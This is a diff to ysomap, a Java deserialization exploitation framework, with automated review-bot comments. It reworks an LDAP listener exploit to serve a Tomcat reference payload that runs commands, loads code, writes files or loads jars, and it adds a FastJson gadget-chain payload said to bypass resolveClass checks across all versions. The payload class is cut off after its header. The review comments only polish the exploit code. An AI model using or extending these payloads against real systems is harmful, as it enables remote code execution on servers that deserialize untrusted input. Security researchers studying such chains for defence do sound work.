diff --git a/common/src/main/java/ysomap/common/annotation/Authors.java b/common/src/main/java/ysomap/common/annotation/Authors.java
index c69ea3a..d70c5e1 100755
--- a/common/src/main/java/ysomap/common/annotation/Authors.java
+++ b/common/src/main/java/ysomap/common/annotation/Authors.java
@@ -28,6 +28,7 @@
String LALA = "lala";
String KINGX = "kingx";
String JANG = "Jang";
+ String whocansee = "whocansee";
String[] value() default {};
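Review bot: The new constant `whocansee` is the only lower-case name in this constant list; the neighbouring `LALA`, `KINGX` and `JANG` follow the UPPER_SNAKE_CASE convention for constants. Rename it `String WHOCANSEE = "whocansee";` and update the one reference this commit adds, `@Authors({ Authors.whocansee })` in BadAttributeValueExpExceptionWithJsonObject, to `Authors.WHOCANSEE`. The enclosing annotation type starts outside this hunk.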
diff --git a/core/pom.xml b/core/pom.xml
index 0152ce9..3cfa7b4 100644
--- a/core/pom.xml
+++ b/core/pom.xml
@@ -49,10 +49,35 @@
compile
+
+ com.fasterxml.jackson.core
+ jackson-annotations
+ 2.13.2
+
+
+ com.fasterxml.jackson.core
+ jackson-core
+ 2.13.2
+
com.fasterxml.jackson.core
jackson-databind
- ${jackson.version}
+ 2.13.2
+
+
+ com.fasterxml.jackson.datatype
+ jackson-datatype-jdk8
+ 2.13.2
+
+
+ com.fasterxml.jackson.datatype
+ jackson-datatype-jsr310
+ 2.13.2
+
+
+ com.fasterxml.jackson.module
+ jackson-module-parameter-names
+ 2.13.2
${hessian.group}
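Review bot: The version `2.13.2` is now written literally on six artifacts (annotations, core, databind, the two datatype modules and parameter-names) while the `${jackson.version}` property the databind entry previously used is dropped, so the Jackson modules can drift apart on the next bump and the property presumably still exists elsewhere with a different value. Set the version once, `<jackson.version>2.13.2</jackson.version>`, and reference `${jackson.version}` on every artifact, or import `jackson-bom` under `dependencyManagement` so all modules are pinned together. 2.13.2 is an early 2.13.x release; confirm that this exact patch level is intended rather than the latest 2.13.x. The XML element tags appear to have been stripped from this hunk in rendering, so the element names are inferred.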
diff --git a/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java b/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
index af51931..45733a1 100755
--- a/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
+++ b/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
@@ -75,12 +75,12 @@ public String getPayload(String data){
".eval(\""+ data +"\")";
}
- public static Bullet newInstance(Object... args) throws Exception {
+ public static Bullet newInstance(Object...args) throws Exception {
Bullet bullet = new TomcatRefBullet();
- bullet.set("type", args[0]);
- bullet.set("body", args[1]);
- bullet.set("classname", args[2]);
- bullet.set("filepath", args[3]);
+ bullet.set("body", args[0]);
+ bullet.set("classname", args[1]);
+ bullet.set("filepath", args[2]);
+ bullet.set("type", args[3]);
return bullet;
}
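Review bot: `newInstance` reads `args[0]` through `args[3]` with no length check, so a caller supplying fewer than four arguments gets an `ArrayIndexOutOfBoundsException` rather than a meaningful error, and the positional contract has silently changed (`type` moved from index 0 to index 3), which a caller still using the old order would not notice at compile time. Add a guard at the top, `if (args.length < 4) { throw new IllegalArgumentException("expected (body, classname, filepath, type), got " + args.length); }`, and document the order in a Javadoc comment on the method. The only caller visible here, `LDAPTomcatRefListener.work()`, is updated in this commit; other callers are not visible. The space removed from `Object... args` on the signature line is also the less common formatting.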
diff --git a/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java b/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
index 0c87f71..f68020e 100644
--- a/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
+++ b/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
@@ -35,8 +35,18 @@ public class LDAPTomcatRefListener extends AbstractExploit {
public String lport = "1389";
@NotNull
- @Require(name = "command", detail = DetailHelper.COMMAND)
- private String command;
+ @Require(name = "body", detail = "根据type类型,传入命令或代码")
+ private String body;
+
+ @Require(name = "classname", detail = "当type为代码时,需要填上最终载入的classname")
+ private String classname;
+
+ @Require(name = "filepath", detail = "当type为fw时,需要填上最终写入的文件位置")
+ private String filepath;
+
+ @NotNull
+ @Require(name = "type", detail = "支持cmd、code、fw、loadJar")
+ private String type;
private InMemoryDirectoryServer ds;
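Review bot: The removed line took its `@Require` detail from the shared `DetailHelper.COMMAND` constant, whereas the four new fields inline literal detail strings; since `TomcatRefBullet.newInstance` sets the same `body`, `classname`, `filepath` and `type` keys, the parameter descriptions now presumably live in two places. Consider lifting them into `DetailHelper` constants (e.g. `DetailHelper.TYPE`, `DetailHelper.BODY`) so listener and bullet stay consistent. A short field comment such as `// classname is used only for type "code", filepath only for type "fw"` would make the conditional optionality explicit without reading the detail strings. The enclosing class starts outside this hunk.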
@@ -54,7 +64,7 @@ public void work() {
SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));
Serializer serializer = SerializerFactory.createSerializer("default");
- Bullet bullet = TomcatRefBullet.newInstance("cmd", command, null, null);
+ Bullet bullet = TomcatRefBullet.newInstance(type, body,classname,filepath);
config.addInMemoryOperationInterceptor(
new LocalChainOperationInterceptor((byte[]) serializer.serialize(bullet.getObject())));
ds = new InMemoryDirectoryServer(config);
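Review bot: `type` is forwarded to `TomcatRefBullet.newInstance` on the `+` line without being checked against the four values the field's `@Require` detail lists (cmd, code, fw, loadJar), so a mistyped value is only caught later, if at all; whether the bullet rejects it is not visible here. Likewise `classname` and `filepath` are passed as `null` when unset with no check that the one the chosen `type` depends on is present. Validate before building the bullet, e.g. `if (!SUPPORTED_TYPES.contains(type)) { throw new IllegalArgumentException("unsupported type: " + type); }` with a `static final Set<String>` of the four names, and add the matching classname/filepath presence check. `work()` starts outside this hunk.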
@@ -77,7 +87,7 @@ public void stop() {
public String toString() {
return "LDAPTomcatRefListener{" +
"lport='" + lport + '\'' +
- ", command='" + command + '\'' +
+ ", command='" + body + '\'' +
'}';
}
}
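Review bot: `toString` still labels the value `command=` although the field is now `body`, and the new `type`, `classname` and `filepath` fields are not included, so any log or debug output misreports the listener's configuration. Change the `+` line to `", type='" + type + '\'' + ", body='" + body + '\'' +` and append `classname` and `filepath` in the same form before the closing `'}'`.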
diff --git a/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java b/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java
new file mode 100644
index 0000000..75f2e65
--- /dev/null
+++ b/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java
@@ -0,0 +1,73 @@
+package ysomap.payloads.java.fastjson;
+
+import com.alibaba.fastjson.JSONObject;
+import ysomap.bullets.Bullet;
+import ysomap.bullets.jdk.LdapAttributeBullet;
+import ysomap.common.annotation.*;
+import ysomap.core.util.DetailHelper;
+import ysomap.core.util.PayloadHelper;
+import ysomap.payloads.AbstractPayload;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.HashMap;
+import java.util.Objects;
+
+/**
+ * @author whocansee
+ * @since 2023/10/7
+ * BadAttributeValueExpException.readObject->JsonObject.toString->bullet对象的getter方法
+ * 原链JsonObject1缺失触发toString的部分,且仅支持FastJson低版本
+ * 此链根据Y4tacker师傅的思路实现了Reference包裹绕过高版本后JsonObject重写的readObject方法中的resolveClass检查,从而支持FastJson全版本
+ * 由于FastJson序列化逻辑中getter调用顺序的问题,在调用到getDatabaseMetaData()之前就会报错,因而不支持JdbcRowSetImplBullet
+ */
+@Payloads
+@SuppressWarnings({"rawtypes"})
+@Authors({ Authors.whocansee })
+@Targets({Targets.JDK})
+@Require(bullets = {"LdapAttributeBullet", "TemplatesImplBullet"}, param = false)
+@Dependencies({"FastJson all versions."})
+@Details("BadAttributeValueExpException.readObject->JsonObject.toString->bullet对象的getter方法" +
+ "此链根据Y4tacker师傅的思路实现了Reference包裹绕过高版本后JsonObject重写的readObject方法中的resolveClass检查,从而支持FastJson全版本")
+
+public class BadAttributeValueExpExceptionWithJsonObject extends AbstractPayload